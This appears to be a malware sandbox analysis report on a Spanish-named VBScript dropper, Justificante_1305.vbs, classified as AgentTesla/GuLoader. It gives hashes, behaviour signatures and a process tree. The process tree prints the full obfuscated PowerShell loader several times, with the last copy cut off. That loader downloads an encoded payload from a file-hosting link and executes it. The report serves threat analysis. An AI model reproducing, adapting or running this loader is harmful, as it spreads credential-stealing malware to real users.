Overview

overview

10

Static

static

1

Justificante_1305.vbs

windows7-x64

10

Justificante_1305.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-09-2024 14:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Justificante_1305.vbs

  • Size

    19KB

  • MD5

    9b1f7ea12daa77c87447f05ff1ac6f5e

  • SHA1

    58d9c2cb1c146a81412a308d1c6b6b8b6e31f1a4

  • SHA256

    2e98277dc23d49726e32785822944fd82ad43068321e1b5ee7e5d1d8a8bc1bbc

  • SHA512

    035a86675229744b63b5f0974164e12e6934a35074f59986b232bf4c6acda245bca34982b8c649ac934659e6af0e8e33ed7b049c58bda787ba9277956c06114b

  • SSDEEP

    384:pQ3GOmBsxCnn+8jZHMfOOoq76ITBJQcO5I4xDIeiAD2F7sGk:639cs8n+0ej2OBJQczIT1

Score
10/10
agentteslaguloadercredential_accessdiscoverydownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 3 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Justificante_1305.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1548
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subbrigade Flleshusene Forskningsministeriet genlsere #>;$Overheatedly='Machairodont';<#Erhvervsevne Inkassogebyr Prelegislative Eksportaktiviteternes Diebrnenes Mouseion Passagerskib #>;$Reselects=$host.PrivateData;If ($Reselects) {$Stylized++;}function Vigils202($Barryggenes){$Blankversenes=$Barryggenes.Length-$Stylized;for( $Sommerlejrene=4;$Sommerlejrene -lt $Blankversenes;$Sommerlejrene+=5){$Presseetikken+=$Barryggenes[$Sommerlejrene];}$Presseetikken;}function Fanklubbernes($Dvlende153){ . ($Trusseredere) ($Dvlende153);}$dentalmen=Vigils202 ' .xtMS luoThrezrodoiSlmnlTar,ljd,kaSkyg/Su e5Aars.Fler0 Pie Un.n(AdvaWIseniIn enmi id peroVi,iw NoesUpgr AmtsN BatTPero log1Udmr0 Squ. S.b0lege;bagn UsurWHenhiUfo nRi k6L gh4 eli;fu t ko.mxRero6 Dyr4 Cen;R li Tilr.rusvReso:Vapo1Newy2Flet1wagg.A.me0Kahy)Rums EnvG me eKonecDiplkRigooTria/Simo2 Ros0Pene1Atti0 Reg0Dame1Harp0Li i1 Hos De,mFPladiAdgarJasyeklejfTectosp exN tr/Re n1 rd2Fogg1Vers.Krys0 Pu. ';$Meddelelseshemmeligheds=Vigils202 'Trolu FlaS.lubETridr,eak- parA emeGSeb.e Hern AkaTDis ';$Aflejringerne=Vigils202 'Br,shEksptDoktt TanpShebs nva:Fort/Kaya/PolydLimprR keiRacevConve U c. behgSon oflyvo RemgB nalAd eeSoli.SupecAskeoPedamSky /,oveu morc Kr ? ArgeDecax Forp Me,oRangrTheatForl=alcodKemoo LuswUnden.ordlUnmeoNoneaembadUnho& auiAffrd Gi =S or1 Li lFlacMmu iwNonaX Fi ooktef hee7,lve5 Ret-B mpu sel0Leig_Tripv uvXDila_Hjem6roquuLingcRomaJTempa.nkeKTra,VN ldkSa aCRaasy Fors GalbBran1T,lk-IncofOpg 2opis7Bush ';$Advertizes=Vigils202 'svrt>Rigs ';$Trusseredere=Vigils202 'Vin,IEnamETer xTria ';$Selines2='Obreptitious204';$Kufferten = Vigils202 ' scoeUndecKl.nh G mo R a Livg%Sp ka agp Unep Sald ebaa JoytObsta Jo %Maks\E igPArgloFormttvanb LopoSa,ai He l,jmoeRedrdEmpe.SlutAosu,s Un yPhan tail& Kol&T nk Mu.eWag c ymbhTtnio .ra Arrt lli ';Fanklubbernes (Vigils202 'Noni$mph gSammlPeo.o lenbForda I.olSkld:PertSNverpPepsr Ea g KaleArkibSenaiHeats Rest ktnHebeiHe lnd omgTr leCentnUnins ree= ill(Reklc .emmForfdFore Slov/Cyanc Adk N l$ClouKSalmuKaldf Skmfprese N nrForttUnb eF den,amp)Phen ');Fanklubbernes (Vigils202 'Ured$RetagSkyglYohooShorbDdsaa NvnlCont:Ld,dA emkdGalumEks i alknKnuriTotac lkau illfolkagenerKlasy ffr= Kul$ZombAunf.fCa.ol SereAmmoj StjrSlr iFremnN,wegVarseMillrNoncnHelte neb.py osAnagpMudil Jeni Irit.ome(Muse$Und,AEcondEftevAs oeUn,srUnhut ModiBrilz.krme ynksKn,v) Par ');Fanklubbernes (Vigils202 'Paxt[Se aNVanieHje t Eru. Un Sbenee Snor TopvMenui H dcvaleeSpioP KosoaberiPan,n In t UidMbutyaKillnHu maGemwgAffaeVan rKond] L,d:Galv: StoSDrejeBes c GiouAdrerMo,piMilitNoniyNontPNo srDoksoTrantRrsaoUs acOrthoOrdrl,emi arm= Fje Aftr[ChelNs,ste Altt et.tranSN nheVigacSkrauS oor,endiRundtAflbyDagpPProgr UdpoS oltFlugo M,lcAl ooInsploketTSoegyAppepAmbleTe n]Syli:Sl s:DataTKuldl Pros R m1Crus2 Sky ');$Aflejringerne=$Adminiculary[0];$Reversify= (Vigils202 '.ndv$MedigDry lA.svoPaahB usiAent.lPara:LullFTen IPreisAp.lhAnism AdvO GisnKundGSla E InoR Roe8Be l3Sah =UppinRi gE,aanWGuld-AfteOunfrBAutojKbeneManucPlatTReca YalesJagtYfra,SAffatPro EP.asm,nos. M,nNwessE styT ys.D ypwpresEDe.ib A,scPourlLeveIIdioe,parN reT');$Reversify+=$Sprgebistningens[1];Fanklubbernes ($Reversify);Fanklubbernes (Vigils202 'Sydn$ IntFT ani ipusUni,hReprmVivcoDepinB,mog BideUnder Pte8 ont3Sens.DyveHForteDk,iaHydrd.regeVentr ,rus Kla[,ona$ShanMOphieGraddCochd toeSubslStikeOpsplTaksssvove A vsSkrkh Blte ejsmNon m Ge eF,rolFllei limg ,orhBrude Whodsours Aes]Time=B.sg$Inh dSndeeG lonGyratTethaCat lPe,vmantieBiscn Moo ');$Sidestillendes=Vigils202 'Hors$PoetFS.rii Af.sAto,hFastmxiivoGrydnFozig Weae uksr Pla8Fyr 3Malk.RebuDFluso rigwDermnCi,dlIrreobeyoaGramdBeskFUltriVskelStafeManu(Baci$KlagAFrizfPolyl BeaeOverjT ttrLiniiDetenDyrkgSneeeScaprDannn ateeE bo,Cixi$ScarsD,vaaSesqgProdnArguoVkkemToadsO.sepDooduDiabnEx udM srnTrafeSates ppl)Nati ';$sagnomspundnes=$Sprgebistningens[0];Fanklubbernes (Vigils202 'Tort$ HarG Lapl PopolibbbBanaAOverLAlbi:FutuLfiloAD,ifFTranGGuntI SelFTegnt JeaEStudnAnmo2Cafe3 P.a2F br=Sikk( C lT toweElecsD mitSh.r-Re pP,omuACamptR seHIn e S.ur$DiabSI peAOlieGInstn anzO.ilamL,llsBodePStvnuD,msNDi pdVaren ,nceS hosSupe)Homo ');while (!$Lafgiften232) {Fanklubbernes (Vigils202 'Pe e$unafgConclTranoEvenb maraCynol ono:ImpeGMyrmrStb u ousnV rkd RantSordv PesiFrdigE doi.allaLovenT aceF,edrDagseEskan Cyp=reta$Ann tPuncrReneu T,aeFlad ') ;Fanklubbernes $Sidestillendes;Fanklubbernes (Vigils202 'p,okSMilatPho,aShivrStegt old- TraS S llKrise rsteth,cpV,gi Come4Vejr ');Fanklubbernes (Vigils202 'Assu$PacugNigrl emo PribPladaC umlRepr:AccoLBenzaIndsfKlevgCalliHumifEpiptOvereGo.dnStri2Emba3Orie2Pola= Thr(M jkTUnree .nos nbtPol,-afv.PWelsaEl.ktOnchhPrag Mys$ ,pas NonaAdopgReh nA beoAndrmAandsZoacpRdalu Id nEl kdAfsknEksted,tisscat)Gyro ') ;Fanklubbernes (Vigils202 ' cap$ unwgR,til LudoSensbStimaStjalResh: QuaaPerifNul,f Hane PrekTopbt.odwas trtDisaiM llo ogindivu=U jo$Analg nudlE uiob rkb Te.aUnarl Epi:Gle BVersaKi,irudtobo,sce ediiGlunrWattoUfat+ fot+ Pas%My.e$Is cA Badd GnimdaguiBa an jvli ndc Sm uUdaal LazaSterrunreyIken.Dobbc TesoDiknu BorncitrtA,ns ') ;$Aflejringerne=$Adminiculary[$affektation];}$spirt=326747;$Skibshandlerens=29164;Fanklubbernes (Vigils202 'T pp$OpgagMaealSivsoStadb Seia.eptlM,ng: anOTapexTh ri Ldrd CitaEffesStateL,so8 Ac.9Over Wrai= Pop EnsiGBnnee,ialtNiss-MannCBrudoGathn dudt oweeSnicn I tt D,k isc $FerisFoppaUdelgBon.nFlotoDiacmTr.gsAppapGoveue tinRugadg stnPaa.e AbusLiby ');Fanklubbernes (Vigils202 'S.or$MitigInsplGardo esebU unaS,enl Bas:LgneACoqul It b olla umnBag sSkovkAdse phly= dir For[MargSWillyGladsAfl tSeedeUnacm.ach.B,siC ndmoBandnSt bvArmueBa,gr Pr,t Bis] ran:Brob: FolFDi trReteo perminddBYlahaTeonsMonteSubt6Em a4Rep.SAlemtGentrMiljiStoinDun gMaib( Sus$Cr.dO lasx SpriAn.idS peaVarisou reBegi8 Bro9,eno)Afp ');Fanklubbernes (Vigils202 'symp$RevugVarelFr toYerebVartaArgol Kap: eryMMousaB anlGroskSk vnTresiB nynCyligHatcePracrV cksUkl D,a= as Svas[su cSClinyId osNonetPraeestarmGam .NecrTRacheA tixDygttTu.b.FlukE O fnUndecTospoUensd liviUn un T,ngBill]Bli.:Reel:Spa ABrecSG leC undIHalvIEngr.BetoG paeP yltPseuSDalrt.rotrTfleiPsycnIndag Nab( Dan$ skrAsnorlRumpbIntea.ptrnPe,tsF,mek Est)Klo ');Fanklubbernes (Vigils202 'Nonb$EftegRoutl Ho,oAf eb Udga AfslFads:BhutA G.yrLserc enko vers at=Tilb$R omMSolvaHumol dy,kgaldnBarkiD,adnIrreg,otae scerVaclsSemi.Gelis Te uTirsb pysSoott,ailrBraniTi.sn Papg Ma (Jara$SparsBratp resiEphyr,eigt Ten,Vort$ H lSPulmk UnaiProcbUbess AfthOli aDis nOv rdLegil PraeUndvrBsteePerenPrers .ip)Synd ');Fanklubbernes $Arcos;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4524
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Potboiled.Asy && echo t"
        3⤵
          PID:2784
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Subbrigade Flleshusene Forskningsministeriet genlsere #>;$Overheatedly='Machairodont';<#Erhvervsevne Inkassogebyr Prelegislative Eksportaktiviteternes Diebrnenes Mouseion Passagerskib #>;$Reselects=$host.PrivateData;If ($Reselects) {$Stylized++;}function Vigils202($Barryggenes){$Blankversenes=$Barryggenes.Length-$Stylized;for( $Sommerlejrene=4;$Sommerlejrene -lt $Blankversenes;$Sommerlejrene+=5){$Presseetikken+=$Barryggenes[$Sommerlejrene];}$Presseetikken;}function Fanklubbernes($Dvlende153){ . ($Trusseredere) ($Dvlende153);}$dentalmen=Vigils202 ' .xtMS luoThrezrodoiSlmnlTar,ljd,kaSkyg/Su e5Aars.Fler0 Pie Un.n(AdvaWIseniIn enmi id peroVi,iw NoesUpgr AmtsN BatTPero log1Udmr0 Squ. S.b0lege;bagn UsurWHenhiUfo nRi k6L gh4 eli;fu t ko.mxRero6 Dyr4 Cen;R li Tilr.rusvReso:Vapo1Newy2Flet1wagg.A.me0Kahy)Rums EnvG me eKonecDiplkRigooTria/Simo2 Ros0Pene1Atti0 Reg0Dame1Harp0Li i1 Hos De,mFPladiAdgarJasyeklejfTectosp exN tr/Re n1 rd2Fogg1Vers.Krys0 Pu. ';$Meddelelseshemmeligheds=Vigils202 'Trolu FlaS.lubETridr,eak- parA emeGSeb.e Hern AkaTDis ';$Aflejringerne=Vigils202 'Br,shEksptDoktt TanpShebs nva:Fort/Kaya/PolydLimprR keiRacevConve U c. behgSon oflyvo RemgB nalAd eeSoli.SupecAskeoPedamSky /,oveu morc Kr ? ArgeDecax Forp Me,oRangrTheatForl=alcodKemoo LuswUnden.ordlUnmeoNoneaembadUnho& auiAffrd Gi =S or1 Li lFlacMmu iwNonaX Fi ooktef hee7,lve5 Ret-B mpu sel0Leig_Tripv uvXDila_Hjem6roquuLingcRomaJTempa.nkeKTra,VN ldkSa aCRaasy Fors GalbBran1T,lk-IncofOpg 2opis7Bush ';$Advertizes=Vigils202 'svrt>Rigs ';$Trusseredere=Vigils202 'Vin,IEnamETer xTria ';$Selines2='Obreptitious204';$Kufferten = Vigils202 ' scoeUndecKl.nh G mo R a Livg%Sp ka agp Unep Sald ebaa JoytObsta Jo %Maks\E igPArgloFormttvanb LopoSa,ai He l,jmoeRedrdEmpe.SlutAosu,s Un yPhan tail& Kol&T nk Mu.eWag c ymbhTtnio .ra Arrt lli ';Fanklubbernes (Vigils202 'Noni$mph gSammlPeo.o lenbForda I.olSkld:PertSNverpPepsr Ea g KaleArkibSenaiHeats Rest ktnHebeiHe lnd omgTr leCentnUnins ree= ill(Reklc .emmForfdFore Slov/Cyanc Adk N l$ClouKSalmuKaldf Skmfprese N nrForttUnb eF den,amp)Phen ');Fanklubbernes (Vigils202 'Ured$RetagSkyglYohooShorbDdsaa NvnlCont:Ld,dA emkdGalumEks i alknKnuriTotac lkau illfolkagenerKlasy ffr= Kul$ZombAunf.fCa.ol SereAmmoj StjrSlr iFremnN,wegVarseMillrNoncnHelte neb.py osAnagpMudil Jeni Irit.ome(Muse$Und,AEcondEftevAs oeUn,srUnhut ModiBrilz.krme ynksKn,v) Par ');Fanklubbernes (Vigils202 'Paxt[Se aNVanieHje t Eru. Un Sbenee Snor TopvMenui H dcvaleeSpioP KosoaberiPan,n In t UidMbutyaKillnHu maGemwgAffaeVan rKond] L,d:Galv: StoSDrejeBes c GiouAdrerMo,piMilitNoniyNontPNo srDoksoTrantRrsaoUs acOrthoOrdrl,emi arm= Fje Aftr[ChelNs,ste Altt et.tranSN nheVigacSkrauS oor,endiRundtAflbyDagpPProgr UdpoS oltFlugo M,lcAl ooInsploketTSoegyAppepAmbleTe n]Syli:Sl s:DataTKuldl Pros R m1Crus2 Sky ');$Aflejringerne=$Adminiculary[0];$Reversify= (Vigils202 '.ndv$MedigDry lA.svoPaahB usiAent.lPara:LullFTen IPreisAp.lhAnism AdvO GisnKundGSla E InoR Roe8Be l3Sah =UppinRi gE,aanWGuld-AfteOunfrBAutojKbeneManucPlatTReca YalesJagtYfra,SAffatPro EP.asm,nos. M,nNwessE styT ys.D ypwpresEDe.ib A,scPourlLeveIIdioe,parN reT');$Reversify+=$Sprgebistningens[1];Fanklubbernes ($Reversify);Fanklubbernes (Vigils202 'Sydn$ IntFT ani ipusUni,hReprmVivcoDepinB,mog BideUnder Pte8 ont3Sens.DyveHForteDk,iaHydrd.regeVentr ,rus Kla[,ona$ShanMOphieGraddCochd toeSubslStikeOpsplTaksssvove A vsSkrkh Blte ejsmNon m Ge eF,rolFllei limg ,orhBrude Whodsours Aes]Time=B.sg$Inh dSndeeG lonGyratTethaCat lPe,vmantieBiscn Moo ');$Sidestillendes=Vigils202 'Hors$PoetFS.rii Af.sAto,hFastmxiivoGrydnFozig Weae uksr Pla8Fyr 3Malk.RebuDFluso rigwDermnCi,dlIrreobeyoaGramdBeskFUltriVskelStafeManu(Baci$KlagAFrizfPolyl BeaeOverjT ttrLiniiDetenDyrkgSneeeScaprDannn ateeE bo,Cixi$ScarsD,vaaSesqgProdnArguoVkkemToadsO.sepDooduDiabnEx udM srnTrafeSates ppl)Nati ';$sagnomspundnes=$Sprgebistningens[0];Fanklubbernes (Vigils202 'Tort$ HarG Lapl PopolibbbBanaAOverLAlbi:FutuLfiloAD,ifFTranGGuntI SelFTegnt JeaEStudnAnmo2Cafe3 P.a2F br=Sikk( C lT toweElecsD mitSh.r-Re pP,omuACamptR seHIn e S.ur$DiabSI peAOlieGInstn anzO.ilamL,llsBodePStvnuD,msNDi pdVaren ,nceS hosSupe)Homo ');while (!$Lafgiften232) {Fanklubbernes (Vigils202 'Pe e$unafgConclTranoEvenb maraCynol ono:ImpeGMyrmrStb u ousnV rkd RantSordv PesiFrdigE doi.allaLovenT aceF,edrDagseEskan Cyp=reta$Ann tPuncrReneu T,aeFlad ') ;Fanklubbernes $Sidestillendes;Fanklubbernes (Vigils202 'p,okSMilatPho,aShivrStegt old- TraS S llKrise rsteth,cpV,gi Come4Vejr ');Fanklubbernes (Vigils202 'Assu$PacugNigrl emo PribPladaC umlRepr:AccoLBenzaIndsfKlevgCalliHumifEpiptOvereGo.dnStri2Emba3Orie2Pola= Thr(M jkTUnree .nos nbtPol,-afv.PWelsaEl.ktOnchhPrag Mys$ ,pas NonaAdopgReh nA beoAndrmAandsZoacpRdalu Id nEl kdAfsknEksted,tisscat)Gyro ') ;Fanklubbernes (Vigils202 ' cap$ unwgR,til LudoSensbStimaStjalResh: QuaaPerifNul,f Hane PrekTopbt.odwas trtDisaiM llo ogindivu=U jo$Analg nudlE uiob rkb Te.aUnarl Epi:Gle BVersaKi,irudtobo,sce ediiGlunrWattoUfat+ fot+ Pas%My.e$Is cA Badd GnimdaguiBa an jvli ndc Sm uUdaal LazaSterrunreyIken.Dobbc TesoDiknu BorncitrtA,ns ') ;$Aflejringerne=$Adminiculary[$affektation];}$spirt=326747;$Skibshandlerens=29164;Fanklubbernes (Vigils202 'T pp$OpgagMaealSivsoStadb Seia.eptlM,ng: anOTapexTh ri Ldrd CitaEffesStateL,so8 Ac.9Over Wrai= Pop EnsiGBnnee,ialtNiss-MannCBrudoGathn dudt oweeSnicn I tt D,k isc $FerisFoppaUdelgBon.nFlotoDiacmTr.gsAppapGoveue tinRugadg stnPaa.e AbusLiby ');Fanklubbernes (Vigils202 'S.or$MitigInsplGardo esebU unaS,enl Bas:LgneACoqul It b olla umnBag sSkovkAdse phly= dir For[MargSWillyGladsAfl tSeedeUnacm.ach.B,siC ndmoBandnSt bvArmueBa,gr Pr,t Bis] ran:Brob: FolFDi trReteo perminddBYlahaTeonsMonteSubt6Em a4Rep.SAlemtGentrMiljiStoinDun gMaib( Sus$Cr.dO lasx SpriAn.idS peaVarisou reBegi8 Bro9,eno)Afp ');Fanklubbernes (Vigils202 'symp$RevugVarelFr toYerebVartaArgol Kap: eryMMousaB anlGroskSk vnTresiB nynCyligHatcePracrV cksUkl D,a= as Svas[su cSClinyId osNonetPraeestarmGam .NecrTRacheA tixDygttTu.b.FlukE O fnUndecTospoUensd liviUn un T,ngBill]Bli.:Reel:Spa ABrecSG leC undIHalvIEngr.BetoG paeP yltPseuSDalrt.rotrTfleiPsycnIndag Nab( Dan$ skrAsnorlRumpbIntea.ptrnPe,tsF,mek Est)Klo ');Fanklubbernes (Vigils202 'Nonb$EftegRoutl Ho,oAf eb Udga AfslFads:BhutA G.yrLserc enko vers at=Tilb$R omMSolvaHumol dy,kgaldnBarkiD,adnIrreg,otae scerVaclsSemi.Gelis Te uTirsb pysSoott,ailrBraniTi.sn Papg Ma (Jara$SparsBratp resiEphyr,eigt Ten,Vort$ H lSPulmk UnaiProcbUbess AfthOli aDis nOv rdLegil PraeUndvrBsteePerenPrers .ip)Synd ');Fanklubbernes $Arcos;"
          3⤵
          • Network Service Discovery
          • Suspicious use of WriteProcessMemory
          PID:3496
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Subbrigade Flleshusene Forskningsministeriet genlsere #>;$Overheatedly='Machairodont';<#Erhvervsevne Inkassogebyr Prelegislative Eksportaktiviteternes Diebrnenes Mouseion Passagerskib #>;$Reselects=$host.PrivateData;If ($Reselects) {$Stylized++;}function Vigils202($Barryggenes){$Blankversenes=$Barryggenes.Length-$Stylized;for( $Sommerlejrene=4;$Sommerlejrene -lt $Blankversenes;$Sommerlejrene+=5){$Presseetikken+=$Barryggenes[$Sommerlejrene];}$Presseetikken;}function Fanklubbernes($Dvlende153){ . ($Trusseredere) ($Dvlende153);}$dentalmen=Vigils202 ' .xtMS luoThrezrodoiSlmnlTar,ljd,kaSkyg/Su e5Aars.Fler0 Pie Un.n(AdvaWIseniIn enmi id peroVi,iw NoesUpgr AmtsN BatTPero log1Udmr0 Squ. S.b0lege;bagn UsurWHenhiUfo nRi k6L gh4 eli;fu t ko.mxRero6 Dyr4 Cen;R li Tilr.rusvReso:Vapo1Newy2Flet1wagg.A.me0Kahy)Rums EnvG me eKonecDiplkRigooTria/Simo2 Ros0Pene1Atti0 Reg0Dame1Harp0Li i1 Hos De,mFPladiAdgarJasyeklejfTectosp exN tr/Re n1 rd2Fogg1Vers.Krys0 Pu. ';$Meddelelseshemmeligheds=Vigils202 'Trolu FlaS.lubETridr,eak- parA emeGSeb.e Hern AkaTDis ';$Aflejringerne=Vigils202 'Br,shEksptDoktt TanpShebs nva:Fort/Kaya/PolydLimprR keiRacevConve U c. behgSon oflyvo RemgB nalAd eeSoli.SupecAskeoPedamSky /,oveu morc Kr ? ArgeDecax Forp Me,oRangrTheatForl=alcodKemoo LuswUnden.ordlUnmeoNoneaembadUnho& auiAffrd Gi =S or1 Li lFlacMmu iwNonaX Fi ooktef hee7,lve5 Ret-B mpu sel0Leig_Tripv uvXDila_Hjem6roquuLingcRomaJTempa.nkeKTra,VN ldkSa aCRaasy Fors GalbBran1T,lk-IncofOpg 2opis7Bush ';$Advertizes=Vigils202 'svrt>Rigs ';$Trusseredere=Vigils202 'Vin,IEnamETer xTria ';$Selines2='Obreptitious204';$Kufferten = Vigils202 ' scoeUndecKl.nh G mo R a Livg%Sp ka agp Unep Sald ebaa JoytObsta Jo %Maks\E igPArgloFormttvanb LopoSa,ai He l,jmoeRedrdEmpe.SlutAosu,s Un yPhan tail& Kol&T nk Mu.eWag c ymbhTtnio .ra Arrt lli ';Fanklubbernes (Vigils202 'Noni$mph gSammlPeo.o lenbForda I.olSkld:PertSNverpPepsr Ea g KaleArkibSenaiHeats Rest ktnHebeiHe lnd omgTr leCentnUnins ree= ill(Reklc .emmForfdFore Slov/Cyanc Adk N l$ClouKSalmuKaldf Skmfprese N nrForttUnb eF den,amp)Phen ');Fanklubbernes (Vigils202 'Ured$RetagSkyglYohooShorbDdsaa NvnlCont:Ld,dA emkdGalumEks i alknKnuriTotac lkau illfolkagenerKlasy ffr= Kul$ZombAunf.fCa.ol SereAmmoj StjrSlr iFremnN,wegVarseMillrNoncnHelte neb.py osAnagpMudil Jeni Irit.ome(Muse$Und,AEcondEftevAs oeUn,srUnhut ModiBrilz.krme ynksKn,v) Par ');Fanklubbernes (Vigils202 'Paxt[Se aNVanieHje t Eru. Un Sbenee Snor TopvMenui H dcvaleeSpioP KosoaberiPan,n In t UidMbutyaKillnHu maGemwgAffaeVan rKond] L,d:Galv: StoSDrejeBes c GiouAdrerMo,piMilitNoniyNontPNo srDoksoTrantRrsaoUs acOrthoOrdrl,emi arm= Fje Aftr[ChelNs,ste Altt et.tranSN nheVigacSkrauS oor,endiRundtAflbyDagpPProgr UdpoS oltFlugo M,lcAl ooInsploketTSoegyAppepAmbleTe n]Syli:Sl s:DataTKuldl Pros R m1Crus2 Sky ');$Aflejringerne=$Adminiculary[0];$Reversify= (Vigils202 '.ndv$MedigDry lA.svoPaahB usiAent.lPara:LullFTen IPreisAp.lhAnism AdvO GisnKundGSla E InoR Roe8Be l3Sah =UppinRi gE,aanWGuld-AfteOunfrBAutojKbeneManucPlatTReca YalesJagtYfra,SAffatPro EP.asm,nos. M,nNwessE styT ys.D ypwpresEDe.ib A,scPourlLeveIIdioe,parN reT');$Reversify+=$Sprgebistningens[1];Fanklubbernes ($Reversify);Fanklubbernes (Vigils202 'Sydn$ IntFT ani ipusUni,hReprmVivcoDepinB,mog BideUnder Pte8 ont3Sens.DyveHForteDk,iaHydrd.regeVentr ,rus Kla[,ona$ShanMOphieGraddCochd toeSubslStikeOpsplTaksssvove A vsSkrkh Blte ejsmNon m Ge eF,rolFllei limg ,orhBrude Whodsours Aes]Time=B.sg$Inh dSndeeG lonGyratTethaCat lPe,vmantieBiscn Moo ');$Sidestillendes=Vigils202 'Hors$PoetFS.rii Af.sAto,hFastmxiivoGrydnFozig Weae uksr Pla8Fyr 3Malk.RebuDFluso rigwDermnCi,dlIrreobeyoaGramdBeskFUltriVskelStafeManu(Baci$KlagAFrizfPolyl BeaeOverjT ttrLiniiDetenDyrkgSneeeScaprDannn ateeE bo,Cixi$ScarsD,vaaSesqgProdnArguoVkkemToadsO.sepDooduDiabnEx udM srnTrafeSates ppl)Nati ';$sagnomspundnes=$Sprgebistningens[0];Fanklubbernes (Vigils202 'Tort$ HarG Lapl PopolibbbBanaAOverLAlbi:FutuLfiloAD,ifFTranGGuntI SelFTegnt JeaEStudnAnmo2Cafe3 P.a2F br=Sikk( C lT toweElecsD mitSh.r-Re pP,omuACamptR seHIn e S.ur$DiabSI peAOlieGInstn anzO.ilamL,llsBodePStvnuD,msNDi pdVaren ,nceS hosSupe)Homo ');while (!$Lafgiften232) {Fanklubbernes (Vigils202 'Pe e$unafgConclTranoEvenb maraCynol ono:ImpeGMyrmrStb u ousnV rkd RantSordv PesiFrdigE doi.allaLovenT aceF,edrDagseEskan Cyp=reta$Ann tPuncrReneu T,aeFlad ') ;Fanklubbernes $Sidestillendes;Fanklubbernes (Vigils202 'p,okSMilatPho,aShivrStegt old- TraS S llKrise rsteth,cpV,gi Come4Vejr ');Fanklubbernes (Vigils202 'Assu$PacugNigrl emo PribPladaC umlRepr:AccoLBenzaIndsfKlevgCalliHumifEpiptOvereGo.dnStri2Emba3Orie2Pola= Thr(M jkTUnree .nos nbtPol,-afv.PWelsaEl.ktOnchhPrag Mys$ ,pas NonaAdopgReh nA beoAndrmAandsZoacpRdalu Id nEl kdAfsknEksted,tisscat)Gyro ') ;Fanklubbernes (Vigils202 ' cap$ unwgR,til LudoSensbStimaStjalResh: QuaaPerifNul,f Hane PrekTopbt.odwas trtDisaiM llo ogindivu=U jo$Analg nudlE uiob rkb Te.aUnarl Epi:Gle BVersaKi,irudtobo,sce ediiGlunrWattoUfat+ fot+ Pas%My.e$Is cA Badd GnimdaguiBa an jvli ndc Sm uUdaal LazaSterrunreyIken.Dobbc TesoDiknu BorncitrtA,ns ') ;$Aflejringerne=$Adminiculary[$affektation];}$spirt=326747;$Skibshandlerens=29164;Fanklubbernes (Vigils202 'T pp$OpgagMaealSivsoStadb Seia.eptlM,ng: anOTapexTh ri Ldrd CitaEffesStateL,so8 Ac.9Over Wrai= Pop EnsiGBnnee,ialtNiss-MannCBrudoGathn dudt oweeSnicn I tt D,k isc $FerisFoppaUdelgBon.nFlotoDiacmTr.gsAppapGoveue tinRugadg stnPaa.e AbusLiby ');Fanklubbernes (Vigils202 'S.or$MitigInsplGardo esebU unaS,enl Bas:LgneACoqul It b olla umnBag sSkovkAdse phly= dir For[MargSWillyGladsAfl tSeedeUnacm.ach.B,siC ndmoBandnSt bvArmueBa,gr Pr,t Bis] ran:Brob: FolFDi trReteo perminddBYlahaTeonsMonteSubt6Em a4Rep.SAlemtGentrMiljiStoinDun gMaib( Sus$Cr.dO lasx SpriAn.idS peaVarisou reBegi8 Bro9,eno)Afp ');Fanklubbernes (Vigils202 'symp$RevugVarelFr toYerebVartaArgol Kap: eryMMousaB anlGroskSk vnTresiB nynCyligHatcePracrV cksUkl D,a= as Svas[su cSClinyId osNonetPraeestarmGam .NecrTRacheA tixDygttTu.b.FlukE O fnUndecTospoUensd liviUn un T,ngBill]Bli.:Reel:Spa ABrecSG leC undIHalvIEngr.BetoG paeP yltPseuSDalrt.rotrTfleiPsycnIndag Nab( Dan$ skrAsnorlRumpbIntea.ptrnPe,tsF,mek Est)Klo ');Fanklubbernes (Vigils202 'Nonb$EftegRoutl Ho,oAf eb Udga AfslFads:BhutA G.yrLserc enko vers at=Tilb$R 